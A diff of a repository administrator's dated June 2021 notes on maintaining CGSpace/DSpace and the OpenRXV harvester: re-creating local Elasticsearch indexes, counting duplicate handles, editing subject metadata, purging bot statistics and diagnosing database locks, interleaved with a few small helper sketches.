                                                                                                                                                                                                                                                                                                                                                                                                                                    -elasticdump --input=/home/aorth/openrxv-items_mapping.json --output=http://localhost:9200/openrxv-items-final --type=mapping
                                                                                                                                                                                                                                                                                                                                                                                                                                    -elasticdump --input=/home/aorth/openrxv-items_data.json --output=http://localhost:9200/openrxv-items-final --type=data --limit=1000
                                                                                                                                                                                                                                                                                                                                                                                                                                    -
                                                                                                                                                                                                                                                                                                                                                                                                                                      +
                                                                                                                                                                                                                                                                                                                                                                                                                                      curl -XDELETE 'http://localhost:9200/openrxv-items-final'
                                                                                                                                                                                                                                                                                                                                                                                                                                      +curl -XDELETE 'http://localhost:9200/openrxv-items-temp'
                                                                                                                                                                                                                                                                                                                                                                                                                                      +curl -XPUT 'http://localhost:9200/openrxv-items-final'
                                                                                                                                                                                                                                                                                                                                                                                                                                      +curl -XPUT 'http://localhost:9200/openrxv-items-temp'
                                                                                                                                                                                                                                                                                                                                                                                                                                      +curl -s -X POST 'http://localhost:9200/_aliases' -H 'Content-Type: application/json' -d'{"actions" : [{"add" : { "index" : "openrxv-items-final", "alias" : "openrxv-items"}}]}'
                                                                                                                                                                                                                                                                                                                                                                                                                                      +elasticdump --input=/home/aorth/openrxv-items_mapping.json --output=http://localhost:9200/openrxv-items-final --type=mapping
                                                                                                                                                                                                                                                                                                                                                                                                                                      +elasticdump --input=/home/aorth/openrxv-items_data.json --output=http://localhost:9200/openrxv-items-final --type=data --limit=1000
                                                                                                                                                                                                                                                                                                                                                                                                                                      +
                                                                                                                                                                                                                                                                                                                                                                                                                                      • Then I started a harvesting on AReS

                                                                                                                                                                                                                                                                                                                                                                                                                                      2021-06-07

                                                                                                                                                                                                                                                                                                                                                                                                                                      @@ -208,8 +208,8 @@ elasticdump --input=/home/aorth/openrxv-items_data.json --output=http://localhos
                                                                                                                                                                                                                                                                                                                                                                                                                                  -
                                                                                                                                                                                                                                                                                                                                                                                                                                  $ podman unshare chown 1000:1000 /home/aorth/.local/share/containers/storage/volumes/docker_esData_7/_data
                                                                                                                                                                                                                                                                                                                                                                                                                                  -
                                                                                                                                                                                                                                                                                                                                                                                                                                    +
                                                                                                                                                                                                                                                                                                                                                                                                                                    $ podman unshare chown 1000:1000 /home/aorth/.local/share/containers/storage/volumes/docker_esData_7/_data
                                                                                                                                                                                                                                                                                                                                                                                                                                    +
                                                                                                                                                                                                                                                                                                                                                                                                                                    • The new OpenRXV harvesting method by Moayad uses pages of 10 items instead of 100 and it’s much faster
                                                                                                                                                                                                                                                                                                                                                                                                                                      • I harvested 90,000+ items from DSpace Test in ~3 hours
                                                                                                                                                                                                                                                                                                                                                                                                                                      • @@ -231,23 +231,23 @@ elasticdump --input=/home/aorth/openrxv-items_data.json --output=http://localhos
                                                                                                                                                                                                                                                                                                                                                                                                                                    -
                                                                                                                                                                                                                                                                                                                                                                                                                                    $ grep -oE '"handle":"[[:digit:]]+/[[:digit:]]+"' openrxv-items_data.json | awk -F: '{print $2}' | wc -l
                                                                                                                                                                                                                                                                                                                                                                                                                                    -90459
                                                                                                                                                                                                                                                                                                                                                                                                                                    -$ grep -oE '"handle":"[[:digit:]]+/[[:digit:]]+"' openrxv-items_data.json | awk -F: '{print $2}' | sort | uniq | wc -l
                                                                                                                                                                                                                                                                                                                                                                                                                                    -90380
                                                                                                                                                                                                                                                                                                                                                                                                                                    -$ grep -oE '"handle":"[[:digit:]]+/[[:digit:]]+"' openrxv-items_data.json | awk -F: '{print $2}' | sort | uniq -c | sort -h
                                                                                                                                                                                                                                                                                                                                                                                                                                    -...
                                                                                                                                                                                                                                                                                                                                                                                                                                    -      2 "10568/99409"
                                                                                                                                                                                                                                                                                                                                                                                                                                    -      2 "10568/99410"
                                                                                                                                                                                                                                                                                                                                                                                                                                    -      2 "10568/99411"
                                                                                                                                                                                                                                                                                                                                                                                                                                    -      2 "10568/99516"
                                                                                                                                                                                                                                                                                                                                                                                                                                    -      3 "10568/102093"
                                                                                                                                                                                                                                                                                                                                                                                                                                    -      3 "10568/103524"
                                                                                                                                                                                                                                                                                                                                                                                                                                    -      3 "10568/106664"
                                                                                                                                                                                                                                                                                                                                                                                                                                    -      3 "10568/106940"
                                                                                                                                                                                                                                                                                                                                                                                                                                    -      3 "10568/107195"
                                                                                                                                                                                                                                                                                                                                                                                                                                    -      3 "10568/96546"
                                                                                                                                                                                                                                                                                                                                                                                                                                    -

                                                                                                                                                                                                                                                                                                                                                                                                                                    2021-06-20

                                                                                                                                                                                                                                                                                                                                                                                                                                    +
                                                                                                                                                                                                                                                                                                                                                                                                                                    $ grep -oE '"handle":"[[:digit:]]+/[[:digit:]]+"' openrxv-items_data.json | awk -F: '{print $2}' | wc -l
                                                                                                                                                                                                                                                                                                                                                                                                                                    +90459
                                                                                                                                                                                                                                                                                                                                                                                                                                    +$ grep -oE '"handle":"[[:digit:]]+/[[:digit:]]+"' openrxv-items_data.json | awk -F: '{print $2}' | sort | uniq | wc -l
                                                                                                                                                                                                                                                                                                                                                                                                                                    +90380
                                                                                                                                                                                                                                                                                                                                                                                                                                    +$ grep -oE '"handle":"[[:digit:]]+/[[:digit:]]+"' openrxv-items_data.json | awk -F: '{print $2}' | sort | uniq -c | sort -h
                                                                                                                                                                                                                                                                                                                                                                                                                                    +...
                                                                                                                                                                                                                                                                                                                                                                                                                                    +      2 "10568/99409"
                                                                                                                                                                                                                                                                                                                                                                                                                                    +      2 "10568/99410"
                                                                                                                                                                                                                                                                                                                                                                                                                                    +      2 "10568/99411"
                                                                                                                                                                                                                                                                                                                                                                                                                                    +      2 "10568/99516"
                                                                                                                                                                                                                                                                                                                                                                                                                                    +      3 "10568/102093"
                                                                                                                                                                                                                                                                                                                                                                                                                                    +      3 "10568/103524"
                                                                                                                                                                                                                                                                                                                                                                                                                                    +      3 "10568/106664"
                                                                                                                                                                                                                                                                                                                                                                                                                                    +      3 "10568/106940"
                                                                                                                                                                                                                                                                                                                                                                                                                                    +      3 "10568/107195"
                                                                                                                                                                                                                                                                                                                                                                                                                                    +      3 "10568/96546"
                                                                                                                                                                                                                                                                                                                                                                                                                                    +
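The two counts above differ by 79 (90459 total handles versus 90380 unique ones), so 79 entries in the dump are repeats. As a minimal sketch of the same check, the snippet below runs the pipeline against a small, made-up sample file (the file contents and the variable names `total`, `unique`, and `dupes` are assumptions for illustration, not part of the original dump) and uses `uniq -d` to list only the handles that occur more than once:

```shell
# Hypothetical sample standing in for openrxv-items_data.json (one document per line)
tmpfile=$(mktemp)
cat > "$tmpfile" <<'EOF'
{"_id":"a","_source":{"handle":"10568/1","title":"One"}}
{"_id":"b","_source":{"handle":"10568/2","title":"Two"}}
{"_id":"c","_source":{"handle":"10568/1","title":"One again"}}
{"_id":"d","_source":{"handle":"10568/3","title":"Three"}}
EOF

# Extract every quoted handle value, one per line (same grep/awk as in the notes)
handles=$(grep -oE '"handle":"[[:digit:]]+/[[:digit:]]+"' "$tmpfile" | awk -F: '{print $2}')

# Count all handles, then only the distinct ones
total=$(printf '%s\n' "$handles" | wc -l | tr -d ' ')
unique=$(printf '%s\n' "$handles" | sort -u | wc -l | tr -d ' ')

# uniq -d prints one copy of each line that appears more than once in sorted input
dupes=$(printf '%s\n' "$handles" | sort | uniq -d)

echo "total=$total unique=$unique surplus=$((total - unique))"
echo "duplicated handles: $dupes"

rm -f "$tmpfile"
```

Compared with `sort | uniq -c | sort -h`, this skips the long tail of handles that appear exactly once, which is convenient when only the duplicates matter.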

                                                                                                                                                                                                                                                                                                                                                                                                                                    2021-06-20

                                                                                                                                                                                                                                                                                                                                                                                                                                    • Udana asked me to update their IWMI subjects from farmer managed irrigation systems to farmer-led irrigation
                                                                                                                                                                                                                                                                                                                                                                                                                                        @@ -255,12 +255,12 @@ $ grep -oE '"handle":"[[:digit:]]+/[
                                                                                                                                                                                                                                                                                                                                                                                                                                    -
                                                                                                                                                                                                                                                                                                                                                                                                                                    $ dspace metadata-export -i 10568/16814 -f /tmp/2021-06-20-IWMI.csv
                                                                                                                                                                                                                                                                                                                                                                                                                                    -
                                                                                                                                                                                                                                                                                                                                                                                                                                      +
                                                                                                                                                                                                                                                                                                                                                                                                                                      $ dspace metadata-export -i 10568/16814 -f /tmp/2021-06-20-IWMI.csv
                                                                                                                                                                                                                                                                                                                                                                                                                                      +
                                                                                                                                                                                                                                                                                                                                                                                                                                      • Then I used csvcut to extract just the columns I needed and do the replacement into a new CSV:
                                                                                                                                                                                                                                                                                                                                                                                                                                      -
                                                                                                                                                                                                                                                                                                                                                                                                                                      $ csvcut -c 'id,dcterms.subject[],dcterms.subject[en_US]' /tmp/2021-06-20-IWMI.csv | sed 's/farmer managed irrigation systems/farmer-led irrigation/' > /tmp/2021-06-20-IWMI-new-subjects.csv
                                                                                                                                                                                                                                                                                                                                                                                                                                      -
                                                                                                                                                                                                                                                                                                                                                                                                                                        +
                                                                                                                                                                                                                                                                                                                                                                                                                                        $ csvcut -c 'id,dcterms.subject[],dcterms.subject[en_US]' /tmp/2021-06-20-IWMI.csv | sed 's/farmer managed irrigation systems/farmer-led irrigation/' > /tmp/2021-06-20-IWMI-new-subjects.csv
                                                                                                                                                                                                                                                                                                                                                                                                                                        +
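One caveat with the `sed` expression above: without the `g` flag it rewrites only the first match on each line, and a row may carry the old term in both `dcterms.subject[]` and `dcterms.subject[en_US]`. A minimal sketch of a sanity check to run before uploading, assuming the same file paths as above (the helper name `count_term` is hypothetical, not part of csvkit or DSpace):

```shell
# Hypothetical helper: count how many lines of a file still contain a fixed string.
count_term() {
    # grep -c prints the number of matching lines; it exits non-zero when
    # that number is 0, so "|| true" keeps the helper usable under "set -e".
    grep -cF -- "$1" "$2" || true
}

# Usage, with the paths from the commands above:
# count_term 'farmer managed irrigation systems' /tmp/2021-06-20-IWMI-new-subjects.csv
# count_term 'farmer-led irrigation' /tmp/2021-06-20-IWMI-new-subjects.csv
```

If the first count is not zero, re-running the replacement with `s/.../.../g` would catch the remaining occurrences.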
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Then I uploaded the resulting CSV to CGSpace, updating 161 items
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Start a harvest on AReS
• I found a bug report and a patch for the issue of private items showing up in the DSpace sitemap
@@ -278,19 +278,19 @@ $ grep -oE '"handle":"[[:digit:]]+/[
                                                                                                                                                                                                                                                                                                                                                                                                                                      -
                                                                                                                                                                                                                                                                                                                                                                                                                                      $ grep -E '"repo":"CGSpace"' openrxv-items_data.json | grep -oE '"handle":"[[:digit:]]+/[[:alnum:]]+"' | wc -l
                                                                                                                                                                                                                                                                                                                                                                                                                                      -90937
                                                                                                                                                                                                                                                                                                                                                                                                                                      -$ grep -E '"repo":"CGSpace"' openrxv-items_data.json | grep -oE '"handle":"[[:digit:]]+/[[:alnum:]]+"' | sort -u | wc -l
                                                                                                                                                                                                                                                                                                                                                                                                                                      -85709
                                                                                                                                                                                                                                                                                                                                                                                                                                      -
                                                                                                                                                                                                                                                                                                                                                                                                                                        +
                                                                                                                                                                                                                                                                                                                                                                                                                                        $ grep -E '"repo":"CGSpace"' openrxv-items_data.json | grep -oE '"handle":"[[:digit:]]+/[[:alnum:]]+"' | wc -l
                                                                                                                                                                                                                                                                                                                                                                                                                                        +90937
                                                                                                                                                                                                                                                                                                                                                                                                                                        +$ grep -E '"repo":"CGSpace"' openrxv-items_data.json | grep -oE '"handle":"[[:digit:]]+/[[:alnum:]]+"' | sort -u | wc -l
                                                                                                                                                                                                                                                                                                                                                                                                                                        +85709
                                                                                                                                                                                                                                                                                                                                                                                                                                        +
                                                                                                                                                                                                                                                                                                                                                                                                                                        • So those could be duplicates from the way we harvest pages, but they could also be from mappings…
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Manually inspecting the duplicates where handles appear more than once:
                                                                                                                                                                                                                                                                                                                                                                                                                                        -
                                                                                                                                                                                                                                                                                                                                                                                                                                        $ grep -E '"repo":"CGSpace"' openrxv-items_data.json | grep -oE '"handle":"[[:digit:]]+/[[:alnum:]]+"' | sort | uniq -c | sort -h
                                                                                                                                                                                                                                                                                                                                                                                                                                        -
                                                                                                                                                                                                                                                                                                                                                                                                                                          +
                                                                                                                                                                                                                                                                                                                                                                                                                                          $ grep -E '"repo":"CGSpace"' openrxv-items_data.json | grep -oE '"handle":"[[:digit:]]+/[[:alnum:]]+"' | sort | uniq -c | sort -h
                                                                                                                                                                                                                                                                                                                                                                                                                                          +
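The two counts above differ by 5,228 (90,937 handle occurrences versus 85,709 unique handles), so most handles appear exactly once and the full `uniq -c` listing is mostly noise. A minimal sketch that prints only the handles seen more than once, assuming the same one-document-per-line export as above (the function name `dup_handles` is hypothetical):

```shell
# Hypothetical helper: list CGSpace handles that occur more than once in an
# OpenRXV export, each prefixed by its occurrence count, lowest count first.
dup_handles() {
    grep -E '"repo":"CGSpace"' "$1" \
        | grep -oE '"handle":"[[:digit:]]+/[[:alnum:]]+"' \
        | sort \
        | uniq -c \
        | awk '$1 > 1 { print $1, $2 }' \
        | sort -n
}

# Usage, with the file from the commands above:
# dup_handles openrxv-items_data.json | tail
```

Piping the result to `wc -l` gives the number of distinct handles that are duplicated, which is a different figure from the 5,228 surplus occurrences.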
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Unfortunately I found no pattern:
                                                                                                                                                                                                                                                                                                                                                                                                                                            • Some appear twice in the Elasticsearch index, but appear in only one collection
                                                                                                                                                                                                                                                                                                                                                                                                                                            • @@ -312,23 +312,23 @@ $ grep -E '"repo":"CGSpace"'
                                                                                                                                                                                                                                                                                                                                                                                                                                          -
                                                                                                                                                                                                                                                                                                                                                                                                                                          $ curl -s -H "Accept: application/json" "https://demo.dspace.org/rest/items?offset=0&limit=5" | jq length
                                                                                                                                                                                                                                                                                                                                                                                                                                          -5
                                                                                                                                                                                                                                                                                                                                                                                                                                          -$ curl -s -H "Accept: application/json" "https://demo.dspace.org/rest/items?offset=0&limit=5" | jq '.[].handle'
                                                                                                                                                                                                                                                                                                                                                                                                                                          -"10673/4"
                                                                                                                                                                                                                                                                                                                                                                                                                                          -"10673/3"
                                                                                                                                                                                                                                                                                                                                                                                                                                          -"10673/6"
                                                                                                                                                                                                                                                                                                                                                                                                                                          -"10673/5"
                                                                                                                                                                                                                                                                                                                                                                                                                                          -"10673/7"
                                                                                                                                                                                                                                                                                                                                                                                                                                          -# log into DSpace Demo XMLUI as admin and make one item private (for example 10673/6)
                                                                                                                                                                                                                                                                                                                                                                                                                                          -$ curl -s -H "Accept: application/json" "https://demo.dspace.org/rest/items?offset=0&limit=5" | jq length       
                                                                                                                                                                                                                                                                                                                                                                                                                                          -4
                                                                                                                                                                                                                                                                                                                                                                                                                                          -$ curl -s -H "Accept: application/json" "https://demo.dspace.org/rest/items?offset=0&limit=5" | jq '.[].handle' 
                                                                                                                                                                                                                                                                                                                                                                                                                                          -"10673/4"
                                                                                                                                                                                                                                                                                                                                                                                                                                          -"10673/3"
                                                                                                                                                                                                                                                                                                                                                                                                                                          -"10673/5"
                                                                                                                                                                                                                                                                                                                                                                                                                                          -"10673/7"
                                                                                                                                                                                                                                                                                                                                                                                                                                          -
                                                                                                                                                                                                                                                                                                                                                                                                                                            +
                                                                                                                                                                                                                                                                                                                                                                                                                                            $ curl -s -H "Accept: application/json" "https://demo.dspace.org/rest/items?offset=0&limit=5" | jq length
                                                                                                                                                                                                                                                                                                                                                                                                                                            +5
                                                                                                                                                                                                                                                                                                                                                                                                                                            +$ curl -s -H "Accept: application/json" "https://demo.dspace.org/rest/items?offset=0&limit=5" | jq '.[].handle'
                                                                                                                                                                                                                                                                                                                                                                                                                                            +"10673/4"
                                                                                                                                                                                                                                                                                                                                                                                                                                            +"10673/3"
                                                                                                                                                                                                                                                                                                                                                                                                                                            +"10673/6"
                                                                                                                                                                                                                                                                                                                                                                                                                                            +"10673/5"
                                                                                                                                                                                                                                                                                                                                                                                                                                            +"10673/7"
                                                                                                                                                                                                                                                                                                                                                                                                                                            +# log into DSpace Demo XMLUI as admin and make one item private (for example 10673/6)
                                                                                                                                                                                                                                                                                                                                                                                                                                            +$ curl -s -H "Accept: application/json" "https://demo.dspace.org/rest/items?offset=0&limit=5" | jq length       
                                                                                                                                                                                                                                                                                                                                                                                                                                            +4
                                                                                                                                                                                                                                                                                                                                                                                                                                            +$ curl -s -H "Accept: application/json" "https://demo.dspace.org/rest/items?offset=0&limit=5" | jq '.[].handle' 
                                                                                                                                                                                                                                                                                                                                                                                                                                            +"10673/4"
                                                                                                                                                                                                                                                                                                                                                                                                                                            +"10673/3"
                                                                                                                                                                                                                                                                                                                                                                                                                                            +"10673/5"
                                                                                                                                                                                                                                                                                                                                                                                                                                            +"10673/7"
                                                                                                                                                                                                                                                                                                                                                                                                                                            +
                                                                                                                                                                                                                                                                                                                                                                                                                                            • I tested the pull request on DSpace Test and it works, so I left a note on GitHub and Jira
                                                                                                                                                                                                                                                                                                                                                                                                                                            • Last week I noticed that the Gender Platform website is using “cgspace.cgiar.org” links for CGSpace, instead of handles
                                                                                                                                                                                                                                                                                                                                                                                                                                                @@ -355,11 +355,11 @@ $ curl -s -H "Accept: application/json"
                                                                                                                                                                                                                                                                                                                                                                                                                                              -
                                                                                                                                                                                                                                                                                                                                                                                                                                              $ grep -oE '"handle":"[[:digit:]]+/[[:digit:]]+"' openrxv-items_data-local-ds-4065.json | wc -l
                                                                                                                                                                                                                                                                                                                                                                                                                                              -90327
                                                                                                                                                                                                                                                                                                                                                                                                                                              -$ grep -oE '"handle":"[[:digit:]]+/[[:digit:]]+"' openrxv-items_data-local-ds-4065.json | sort -u | wc -l
                                                                                                                                                                                                                                                                                                                                                                                                                                              -90317
                                                                                                                                                                                                                                                                                                                                                                                                                                              -

                                                                                                                                                                                                                                                                                                                                                                                                                                              2021-06-22

                                                                                                                                                                                                                                                                                                                                                                                                                                              +
                                                                                                                                                                                                                                                                                                                                                                                                                                              $ grep -oE '"handle":"[[:digit:]]+/[[:digit:]]+"' openrxv-items_data-local-ds-4065.json | wc -l
                                                                                                                                                                                                                                                                                                                                                                                                                                              +90327
                                                                                                                                                                                                                                                                                                                                                                                                                                              +$ grep -oE '"handle":"[[:digit:]]+/[[:digit:]]+"' openrxv-items_data-local-ds-4065.json | sort -u | wc -l
                                                                                                                                                                                                                                                                                                                                                                                                                                              +90317
                                                                                                                                                                                                                                                                                                                                                                                                                                              +
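The two counts above differ by 10 (90327 total matches versus 90317 unique ones), which means 10 surplus occurrences but not necessarily 10 distinct duplicated handles. A minimal sketch of how the duplicated handles themselves could be listed, reusing the same `grep` pattern with `sort | uniq -d`. The sample file and its contents are hypothetical stand-ins for `openrxv-items_data-local-ds-4065.json`:

```shell
#!/bin/sh
# Hypothetical sample data standing in for the real OpenRXV export
sample=$(mktemp)
printf '%s\n' \
  '{"handle":"10568/1","title":"a"}' \
  '{"handle":"10568/2","title":"b"}' \
  '{"handle":"10568/1","title":"a again"}' > "$sample"

# Same pattern as in the notes; uniq -d prints one copy of every
# value that occurs more than once in the sorted input
duplicates=$(grep -oE '"handle":"[[:digit:]]+/[[:digit:]]+"' "$sample" | sort | uniq -d)
echo "$duplicates"

rm -f "$sample"
```

Swapping `uniq -d` for `uniq -c` would show how many times each handle occurs, which helps tell one handle repeated many times apart from many handles repeated once.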

                                                                                                                                                                                                                                                                                                                                                                                                                                              2021-06-22

                                                                                                                                                                                                                                                                                                                                                                                                                                              • Make a pull request to the COUNTER-Robots project to add two new user agents: crusty and newspaper
                                                                                                                                                                                                                                                                                                                                                                                                                                                  @@ -368,13 +368,13 @@ $ grep -oE '"handle":"[[:digit:]]+/[
                                                                                                                                                                                                                                                                                                                                                                                                                                              -
                                                                                                                                                                                                                                                                                                                                                                                                                                              $ ./ilri/check-spider-hits.sh -f dspace/config/spiders/agents/ilri -p   
                                                                                                                                                                                                                                                                                                                                                                                                                                              -Purging 1339 hits from RI\/1\.0 in statistics
                                                                                                                                                                                                                                                                                                                                                                                                                                              -Purging 447 hits from crusty in statistics
                                                                                                                                                                                                                                                                                                                                                                                                                                              -Purging 3736 hits from newspaper in statistics
                                                                                                                                                                                                                                                                                                                                                                                                                                              -
                                                                                                                                                                                                                                                                                                                                                                                                                                              -Total number of bot hits purged: 5522
                                                                                                                                                                                                                                                                                                                                                                                                                                              -
                                                                                                                                                                                                                                                                                                                                                                                                                                                +
                                                                                                                                                                                                                                                                                                                                                                                                                                                $ ./ilri/check-spider-hits.sh -f dspace/config/spiders/agents/ilri -p   
                                                                                                                                                                                                                                                                                                                                                                                                                                                +Purging 1339 hits from RI\/1\.0 in statistics
                                                                                                                                                                                                                                                                                                                                                                                                                                                +Purging 447 hits from crusty in statistics
                                                                                                                                                                                                                                                                                                                                                                                                                                                +Purging 3736 hits from newspaper in statistics
                                                                                                                                                                                                                                                                                                                                                                                                                                                +
                                                                                                                                                                                                                                                                                                                                                                                                                                                +Total number of bot hits purged: 5522
                                                                                                                                                                                                                                                                                                                                                                                                                                                +
                                                                                                                                                                                                                                                                                                                                                                                                                                                • Surprised to see RI/1.0 in there because it’s been in the override file for a while
                                                                                                                                                                                                                                                                                                                                                                                                                                                • Looking at the 2021 statistics in Solr I see a few more suspicious user agents:
                                                                                                                                                                                                                                                                                                                                                                                                                                                    @@ -397,11 +397,11 @@ Purging 3736 hits from newspaper in statistics
                                                                                                                                                                                                                                                                                                                                                                                                                                                -
                                                                                                                                                                                                                                                                                                                                                                                                                                                # journalctl --since=today -u tomcat7 | grep -c 'Connection has been abandoned'
                                                                                                                                                                                                                                                                                                                                                                                                                                                -978
                                                                                                                                                                                                                                                                                                                                                                                                                                                -$ psql -c 'SELECT * FROM pg_locks pl LEFT JOIN pg_stat_activity psa ON pl.pid = psa.pid;' | wc -l
                                                                                                                                                                                                                                                                                                                                                                                                                                                -10100
                                                                                                                                                                                                                                                                                                                                                                                                                                                -
                                                                                                                                                                                                                                                                                                                                                                                                                                                  +
                                                                                                                                                                                                                                                                                                                                                                                                                                                  # journalctl --since=today -u tomcat7 | grep -c 'Connection has been abandoned'
                                                                                                                                                                                                                                                                                                                                                                                                                                                  +978
                                                                                                                                                                                                                                                                                                                                                                                                                                                  +$ psql -c 'SELECT * FROM pg_locks pl LEFT JOIN pg_stat_activity psa ON pl.pid = psa.pid;' | wc -l
                                                                                                                                                                                                                                                                                                                                                                                                                                                  +10100
                                                                                                                                                                                                                                                                                                                                                                                                                                                  +
                                                                                                                                                                                                                                                                                                                                                                                                                                                  • I sent a message to Atmire, hoping that the database logging stuff they put in place last time this happened will be of help now
• In the meantime, I decided to upgrade Tomcat from 7.0.107 to 7.0.109, and the PostgreSQL JDBC driver from 42.2.20 to 42.2.22 (first on DSpace Test)
• I also applied the following patches from the 6.4 milestone to our 6_x-prod branch:
@@ -412,17 +412,17 @@ $ psql -c 'SELECT * FROM pg_locks pl LEFT JOIN p
                                                                                                                                                                                                                                                                                                                                                                                                                                                  • After upgrading and restarting Tomcat the database connections and locks were back down to normal levels:
                                                                                                                                                                                                                                                                                                                                                                                                                                                  -
                                                                                                                                                                                                                                                                                                                                                                                                                                                  $ psql -c 'SELECT * FROM pg_locks pl LEFT JOIN pg_stat_activity psa ON pl.pid = psa.pid;' | wc -l
                                                                                                                                                                                                                                                                                                                                                                                                                                                  -63
                                                                                                                                                                                                                                                                                                                                                                                                                                                  -
                                                                                                                                                                                                                                                                                                                                                                                                                                                    +
                                                                                                                                                                                                                                                                                                                                                                                                                                                    $ psql -c 'SELECT * FROM pg_locks pl LEFT JOIN pg_stat_activity psa ON pl.pid = psa.pid;' | wc -l
                                                                                                                                                                                                                                                                                                                                                                                                                                                    +63
                                                                                                                                                                                                                                                                                                                                                                                                                                                    +
                                                                                                                                                                                                                                                                                                                                                                                                                                                    • Looking in the DSpace log, the first “pool empty” message I saw this morning was at 4AM:
                                                                                                                                                                                                                                                                                                                                                                                                                                                    -
                                                                                                                                                                                                                                                                                                                                                                                                                                                    2021-06-23 04:01:14,596 ERROR org.hibernate.engine.jdbc.spi.SqlExceptionHelper @ [http-bio-127.0.0.1-8443-exec-4323] Timeout: Pool empty. Unable to fetch a connection in 5 seconds, none available[size:250; busy:250; idle:0; lastwait:5000].
                                                                                                                                                                                                                                                                                                                                                                                                                                                    -
                                                                                                                                                                                                                                                                                                                                                                                                                                                      +
                                                                                                                                                                                                                                                                                                                                                                                                                                                      2021-06-23 04:01:14,596 ERROR org.hibernate.engine.jdbc.spi.SqlExceptionHelper @ [http-bio-127.0.0.1-8443-exec-4323] Timeout: Pool empty. Unable to fetch a connection in 5 seconds, none available[size:250; busy:250; idle:0; lastwait:5000].
                                                                                                                                                                                                                                                                                                                                                                                                                                                      +
                                                                                                                                                                                                                                                                                                                                                                                                                                                      • Oh, and I notice 8,000 hits from a Flipboard bot using this user-agent:
                                                                                                                                                                                                                                                                                                                                                                                                                                                      -
                                                                                                                                                                                                                                                                                                                                                                                                                                                      Mozilla/5.0 (Macintosh; Intel Mac OS X 10.11; rv:49.0) Gecko/20100101 Firefox/49.0 (FlipboardProxy/1.2; +http://flipboard.com/browserproxy)
                                                                                                                                                                                                                                                                                                                                                                                                                                                      -
                                                                                                                                                                                                                                                                                                                                                                                                                                                        +
                                                                                                                                                                                                                                                                                                                                                                                                                                                        Mozilla/5.0 (Macintosh; Intel Mac OS X 10.11; rv:49.0) Gecko/20100101 Firefox/49.0 (FlipboardProxy/1.2; +http://flipboard.com/browserproxy)
                                                                                                                                                                                                                                                                                                                                                                                                                                                        +
                                                                                                                                                                                                                                                                                                                                                                                                                                                        • We can purge them, as this is not user traffic: https://about.flipboard.com/browserproxy/
                                                                                                                                                                                                                                                                                                                                                                                                                                                          • I will add it to our local user agent pattern file and eventually submit a pull request to COUNTER-Robots
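The check behind treating these hits as bot traffic can be sketched as a regex match of each user agent against a list of patterns. This is only a minimal sketch: the `PATTERNS` list and the `is_bot` helper are hypothetical names for illustration, and `FlipboardProxy` is an assumed pattern, not necessarily the one that ends up in the local pattern file or in COUNTER-Robots.

```python
import re

# Hypothetical pattern list, one regular expression per entry.
# "FlipboardProxy" is an assumed pattern for illustration only.
PATTERNS = ["FlipboardProxy"]


def is_bot(user_agent, patterns=PATTERNS):
    """Return True if any pattern matches somewhere in the user agent."""
    return any(re.search(pattern, user_agent) for pattern in patterns)


flipboard_ua = (
    "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.11; rv:49.0) "
    "Gecko/20100101 Firefox/49.0 "
    "(FlipboardProxy/1.2; +http://flipboard.com/browserproxy)"
)
browser_ua = "Mozilla/5.0 (X11; Linux x86_64; rv:89.0) Gecko/20100101 Firefox/89.0"
```

With this list, `is_bot(flipboard_ua)` is true while the plain Firefox user agent does not match, which is why matching on the `FlipboardProxy` token rather than on `Firefox` matters here.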
@@ -448,17 +448,17 @@ $ psql -c 'SELECT * FROM pg_locks pl LEFT JOIN p
                                                                                                                                                                                                                                                                                                                                                                                                                                                        -
                                                                                                                                                                                                                                                                                                                                                                                                                                                        $ grep -oE '"handle":"([[:digit:]]|\.)+/[[:digit:]]+"' cgspace-openrxv-items-temp-backup.json | wc -l
                                                                                                                                                                                                                                                                                                                                                                                                                                                        -104797
                                                                                                                                                                                                                                                                                                                                                                                                                                                        -$ grep -oE '"handle":"([[:digit:]]|\.)+/[[:digit:]]+"' cgspace-openrxv-items-temp-backup.json | sort | uniq | wc -l
                                                                                                                                                                                                                                                                                                                                                                                                                                                        -99186
                                                                                                                                                                                                                                                                                                                                                                                                                                                        -
                                                                                                                                                                                                                                                                                                                                                                                                                                                          +
                                                                                                                                                                                                                                                                                                                                                                                                                                                          $ grep -oE '"handle":"([[:digit:]]|\.)+/[[:digit:]]+"' cgspace-openrxv-items-temp-backup.json | wc -l
                                                                                                                                                                                                                                                                                                                                                                                                                                                          +104797
                                                                                                                                                                                                                                                                                                                                                                                                                                                          +$ grep -oE '"handle":"([[:digit:]]|\.)+/[[:digit:]]+"' cgspace-openrxv-items-temp-backup.json | sort | uniq | wc -l
                                                                                                                                                                                                                                                                                                                                                                                                                                                          +99186
                                                                                                                                                                                                                                                                                                                                                                                                                                                          +
                                                                                                                                                                                                                                                                                                                                                                                                                                                          • This number is probably unique for that particular harvest, but I don’t think it represents the true number of items…
                                                                                                                                                                                                                                                                                                                                                                                                                                                          • The harvest of DSpace Test I did on my local test instance yesterday has about 91,000 items:
                                                                                                                                                                                                                                                                                                                                                                                                                                                          -
                                                                                                                                                                                                                                                                                                                                                                                                                                                          $ grep -E '"repo":"DSpace Test"' 2021-06-23-openrxv-items-final-local.json | grep -oE '"handle":"([[:digit:]]|\.)+/[[:digit:]]+"' | sort | uniq | wc -l
                                                                                                                                                                                                                                                                                                                                                                                                                                                          -90990
                                                                                                                                                                                                                                                                                                                                                                                                                                                          -
                                                                                                                                                                                                                                                                                                                                                                                                                                                            +
                                                                                                                                                                                                                                                                                                                                                                                                                                                            $ grep -E '"repo":"DSpace Test"' 2021-06-23-openrxv-items-final-local.json | grep -oE '"handle":"([[:digit:]]|\.)+/[[:digit:]]+"' | sort | uniq | wc -l
                                                                                                                                                                                                                                                                                                                                                                                                                                                            +90990
                                                                                                                                                                                                                                                                                                                                                                                                                                                            +
• So the harvest on the live site is missing items, but then why didn’t the “add missing items” plugin find them?!
                                                                                                                                                                                                                                                                                                                                                                                                                                                              • I notice that we are missing the type in the metadata structure config for each repository on the production site, and we are using type for item type in the actual schema… so maybe there is a conflict there
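The total-versus-unique comparison done with `grep`, `sort`, and `uniq` above can also be sketched in Python. This is a rough equivalent under the assumption that the whole export fits in memory as text; `count_handles` is a hypothetical helper name, and the regular expression mirrors the `grep -oE` pattern rather than parsing the JSON properly.

```python
import re

# Mirrors the grep -oE pattern: digits and dots, a slash, then digits.
HANDLE_RE = re.compile(r'"handle":"[0-9.]+/[0-9]+"')


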